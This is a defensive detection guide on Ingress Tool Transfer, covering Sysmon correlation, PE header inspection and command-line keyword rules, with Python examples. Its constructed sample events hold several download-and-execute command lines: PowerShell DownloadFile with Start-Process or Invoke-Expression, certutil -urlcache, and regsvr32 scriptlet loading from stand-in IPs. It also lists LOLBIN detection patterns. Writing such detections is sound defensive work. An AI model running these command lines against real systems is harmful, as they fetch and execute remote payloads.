Data sources that show process execution and command-line arguments (EDR tools, Sysmon, Windows Event Logs) are likely your best sources for observing and detecting malicious use of Ingress Tool Transfer. These tools let you look for a download or transfer taking place, and they provide leads for further investigation. Using command-line arguments, you can examine the remote systems and content used to facilitate the transfer. For example, PowerShell and curl command lines often include the URLs used to host remote content for download and execution, and those URLs are a useful pivot point during investigations.
EDR tools and other data sources that show process telemetry can also be useful in identifying malicious use. As a rule, more data is usually better than less. In ideal scenarios, we recommend process monitoring tools that provide process name, command-line arguments, file modifications, DLL module loads, and network connections. The sum of this telemetry helps paint a picture of what capabilities exist inside unknown processes or scripts.
Telemetry showing network connections is often essential during investigations. While network connections on their own aren’t suspicious, combining network connection data with the known and expected behaviors of processes can yield high-fidelity results. In addition, correlating network connections with other data points, such as file modifications or time of day, can help suspicious activity stand out from the crowd. A good example of this correlation is certutil.exe making network connections. On its own, the utility doesn’t typically make network connections, but it may make file modifications. If a network connection from certutil.exe occurs alongside file modifications by the same process, you can more reasonably assess that certutil.exe was used for Ingress Tool Transfer.
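The correlation described above, implemented over Sysmon-style process telemetry, as an added example that is not part of the original report. It groups NetworkConnect (Event ID 3) and FileCreate (Event ID 11) events by ProcessGuid and flags any process that writes an executable or script within a short window after making an outbound connection. The events, the 60-second window, the extension list and the set of "quiet" images (binaries that are not expected to make network connections at all, with certutil.exe taken from the text and the others as this example's assumption) are all constructed for illustration and should be tuned to your environment.

```python
from datetime import datetime

# Constructed Sysmon-style events for this example (not real telemetry).
# EventID 3 = NetworkConnect, EventID 11 = FileCreate. Only the fields the
# analytic uses are included.
SAMPLE_EVENTS = [
    {"EventID": 3, "UtcTime": "2024-05-01 10:00:01.000", "ProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 11, "UtcTime": "2024-05-01 10:00:04.500", "ProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "TargetFilename": r"C:\Users\Public\update.exe"},
    # certutil doing certificate work: a file write but no network connection
    {"EventID": 11, "UtcTime": "2024-05-01 09:30:00.000", "ProcessGuid": "{B2}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\root.cer"},
    # a browser saving a download: same shape, but expected behaviour for that image
    {"EventID": 3, "UtcTime": "2024-05-01 11:00:00.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 11, "UtcTime": "2024-05-01 11:00:04.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\bob\Downloads\setup.exe"},
    # connection and write five minutes apart: outside the default window
    {"EventID": 3, "UtcTime": "2024-05-01 12:00:00.000", "ProcessGuid": "{D4}",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "203.0.113.44", "DestinationPort": 80},
    {"EventID": 11, "UtcTime": "2024-05-01 12:05:00.000", "ProcessGuid": "{D4}",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\x.dll"},
]

# File types whose creation right after a connection suggests a tool transfer (assumed list).
TRANSFER_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".scr")

# Images that, in this constructed environment, should never talk to the network.
# certutil.exe comes from the text; the others are this example's assumption.
QUIET_IMAGES = {"certutil.exe", "regsvr32.exe", "rundll32.exe"}


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def correlate_transfers(events, window_seconds=60, quiet_images=QUIET_IMAGES):
    """Return one finding per (connection, executable write) pair from the same
    process where the write happened within window_seconds after the connection."""
    by_process = {}
    for ev in events:
        by_process.setdefault(ev["ProcessGuid"], []).append(ev)

    findings = []
    for guid, evs in by_process.items():
        connects = [e for e in evs if e["EventID"] == 3]
        writes = [e for e in evs if e["EventID"] == 11
                  and e["TargetFilename"].lower().endswith(TRANSFER_EXTENSIONS)]
        for c in connects:
            for w in writes:
                delta = (parse_time(w["UtcTime"]) - parse_time(c["UtcTime"])).total_seconds()
                if 0 <= delta <= window_seconds:
                    image = basename(c["Image"])
                    findings.append({
                        "process_guid": guid,
                        "image": image,
                        "connect_time": c["UtcTime"],
                        "destination": f'{c["DestinationIp"]}:{c["DestinationPort"]}',
                        "file": w["TargetFilename"],
                        "seconds_after_connect": delta,
                        # a binary that should never connect gets top priority;
                        # everything else is handed to an analyst for review
                        "severity": "high" if image in quiet_images else "review",
                    })
    return sorted(findings, key=lambda f: f["connect_time"])


if __name__ == "__main__":
    for f in correlate_transfers(SAMPLE_EVENTS):
        print(f["severity"], f["image"], f["destination"], "->", f["file"],
              f'({f["seconds_after_connect"]}s)')
```

Run against the sample, the certutil.exe pair is reported as high severity, the browser download is reported for review, and the rundll32.exe pair is dropped because the write falls outside the window; widening window_seconds brings it back, which is the usual trade-off between missed slow transfers and analyst noise.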
Finally, web filters, firewalls, and Intrusion Prevention Systems (IPS) that are capable of performing deep content inspection can be useful for identifying executables and DLLs being transferred into the network. Despite adversaries’ attempts at obfuscation, a well-constructed security architecture can enable defenders to spot useful patterns in traffic ingressing to the network from adversary-controlled systems. Good examples of these patterns include MZ headers in executable content and recognizable portions of script content. This sort of data also enables defenders to use additional types of analytics or rules, such as Snort or Suricata detections. By supplementing endpoint detection capabilities with network data, your security team gains coverage that neither source provides on its own.
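As an added example of the content inspection described above (not code from the original report), the following Python checks an HTTP response body for a Windows executable. A bare "MZ" match is not enough: those two bytes occur in ordinary text, so the check also reads the e_lfanew field at offset 0x3C and confirms it points at a "PE\0\0" signature, which is how the format is actually laid out. It then compares the result with the Content-Type header, because an executable served as an image or plain text is a useful pattern on its own. The HTTP responses, the fake PE bytes and the set of content types that commonly carry executables are constructed for this example.

```python
import struct

# Content types under which an executable is plausibly served; anything else
# carrying a PE body is reported as mislabeled. Assumed list for this example.
EXECUTABLE_TYPES = {
    "application/x-msdownload",
    "application/x-dosexec",
    "application/vnd.microsoft.portable-executable",
    "application/octet-stream",
}


def looks_like_pe(data: bytes) -> bool:
    """True if data begins with a DOS header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # The PE header cannot overlap the DOS header and must be inside the buffer;
    # a truncated capture or a bogus offset is treated as "not an executable".
    if e_lfanew < 0x40 or e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe(e_lfanew: int = 0x80) -> bytes:
    """Constructed minimal DOS stub plus PE signature; not a runnable executable."""
    header = bytearray(b"MZ" + b"\x00" * (0x3C - 2))
    header += struct.pack("<I", e_lfanew)
    header += b"\x00" * (e_lfanew - len(header))
    header += b"PE\x00\x00" + b"\x00" * 20
    return bytes(header)


def inspect_http_response(raw: bytes) -> dict:
    """Split a raw HTTP response, read its Content-Type, and classify the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    content_type = ""
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-type":
            content_type = value.strip().decode("latin-1").split(";")[0].strip().lower()
    is_pe = looks_like_pe(body)
    return {
        "content_type": content_type,
        "is_pe": is_pe,
        "mislabeled": is_pe and content_type not in EXECUTABLE_TYPES,
    }


def http_response(content_type: str, body: bytes) -> bytes:
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type.encode()
            + b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed sample traffic for this example.
SAMPLE_RESPONSES = {
    # executable disguised as an image
    "disguised": http_response("image/png", build_fake_pe()),
    # honest executable download
    "honest": http_response("application/x-msdownload", build_fake_pe()),
    # text that merely starts with the letters MZ
    "text": http_response("text/plain", b"MZ is also a keyboard layout code " + b"." * 200),
    # executable cut off before the PE signature
    "truncated": http_response("image/png", build_fake_pe()[:100]),
}


if __name__ == "__main__":
    for name, raw in SAMPLE_RESPONSES.items():
        print(name, inspect_http_response(raw))
```

The same two-step check (MZ at offset 0, PE signature at e_lfanew) is what a Snort or Suricata rule should express rather than matching "MZ" alone; the truncated case shows why a rule that only sees the first packet of a response needs a depth or byte_jump constraint it can actually satisfy.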
By far the most fruitful method by which we have identified malicious Ingress Tool Transfer use is examining PowerShell command lines for keywords and certain patterns. Look for the execution of powershell.exe with command lines containing the keyword downloadfile, particularly when the destination is a temporary or non-standard location (such as appdata) or when it appears in combination with execution.
You should also consider alerting on broader patterns, like the keyword download appearing anywhere in a PowerShell command line, and on certutil.exe command lines that contain urlcache or split.
Another suspicious command pattern that warrants monitoring is wget making an external network connection immediately followed by writing or modifying an executable file, particularly in a temp location.
Other LOLBINs such as regsvr32.exe making external network connections to URLs ending with an executable or image extension, to suspicious domains, or to unusual IP addresses are inherently suspicious and warrant monitoring.
Weeding out false positives
The majority of the telemetry patterns above can also manifest in development pipelines and systems management tools. Given this, and as is the case for many detection ideas in this report, you may want to do an environment audit and figure out if these potentially suspicious behaviors are being employed by any legitimate tools or people in your environment.
Once you understand legitimate use cases, you can tune those out as exceptions and focus your detection efforts on seeking out behaviors that are more likely to represent malicious instances of Ingress Tool Transfer.
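The command-line patterns from the previous section, together with the exception handling described under "Weeding out false positives", as one added example in Python (not code from the original report). analyze_command applies the page's patterns to a single process event: downloadfile in a PowerShell command line dropping to a temporary location or paired with execution, the generic download keyword, certutil.exe with urlcache or split, and LOLBIN command lines carrying URLs that end in an executable or image extension. is_expected then suppresses events that match an environment-specific exception list. The events, the temp-location hints, the interpretation of "execution" as iex or Invoke-Expression, the extra LOLBIN names beyond regsvr32.exe and certutil.exe, and the build-agent exception are all assumptions constructed for this example.

```python
import re

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Extensions the text calls out for LOLBIN URLs: executables and images (assumed list).
SUSPICIOUS_URL_EXT = (".exe", ".dll", ".scr", ".png", ".jpg", ".jpeg", ".gif", ".bmp")
# Path fragments that mark temporary or non-standard drop locations (assumed list).
TEMP_HINTS = ("appdata", "\\temp\\", "programdata", "\\public\\")
# regsvr32.exe and certutil.exe come from the text; the rest are this example's additions.
LOLBINS = {"regsvr32.exe", "certutil.exe", "mshta.exe", "rundll32.exe", "bitsadmin.exe"}
# "in combination with execution" is read here as the iex alias or Invoke-Expression.
EXEC_RE = re.compile(r"\biex\b|invoke-expression")

# Constructed exception: a build agent that legitimately pulls files from an
# internal artifact server. Populate this from your own environment audit.
EXCEPTIONS = [
    {"parent_image": "buildagent.exe", "command_contains": "https://artifacts.corp.example/"},
]

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.exe','C:\Users\bob\AppData\Local\Temp\a.exe'); Start-Process C:\Users\bob\AppData\Local\Temp\a.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -c $c=New-Object Net.WebClient; $c.DownloadFile('http://203.0.113.5/s.ps1','C:\ProgramData\s.ps1'); Invoke-Expression (Get-Content C:\ProgramData\s.ps1 -Raw)"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/p.png C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.5/logo.gif scrobj.dll"},
    # legitimate: the build agent fetching a root certificate from the internal server
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Agent\buildagent.exe",
     "CommandLine": r"certutil.exe -urlcache -f https://artifacts.corp.example/root.cer C:\build\root.cer"},
    # legitimate: ordinary certificate verification, no transfer at all
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_command(event):
    """Return the names of every pattern the event's command line matches."""
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        if "downloadfile" in low:
            if any(h in low for h in TEMP_HINTS):
                hits.append("powershell_downloadfile_to_temp")
            if EXEC_RE.search(low):
                hits.append("powershell_downloadfile_with_execution")
        if "download" in low:
            hits.append("powershell_download_keyword")
    if image == "certutil.exe" and ("urlcache" in low or "split" in low):
        hits.append("certutil_urlcache_or_split")
    if image in LOLBINS:
        for url in URL_RE.findall(cmd):
            path = url.split("?", 1)[0].lower()   # ignore query strings when checking the extension
            if path.endswith(SUSPICIOUS_URL_EXT):
                hits.append("lolbin_url_with_executable_or_image_extension")
                break
    return hits


def is_expected(event):
    """True when the event matches a tuned exception (parent process plus command fragment)."""
    parent = basename(event.get("ParentImage", ""))
    return any(parent == x["parent_image"] and x["command_contains"] in event["CommandLine"]
               for x in EXCEPTIONS)


def triage(events):
    """Events that match at least one pattern and are not covered by an exception."""
    results = []
    for i, ev in enumerate(events):
        hits = analyze_command(ev)
        if hits and not is_expected(ev):
            results.append({"index": i, "image": basename(ev["Image"]), "hits": hits})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["index"], r["image"], ", ".join(r["hits"]))
```

Exceptions are keyed on the parent process and a command-line fragment rather than on the image alone, so the build agent's certutil.exe use is tuned out while an attacker running the same binary from cmd.exe against an external host still fires.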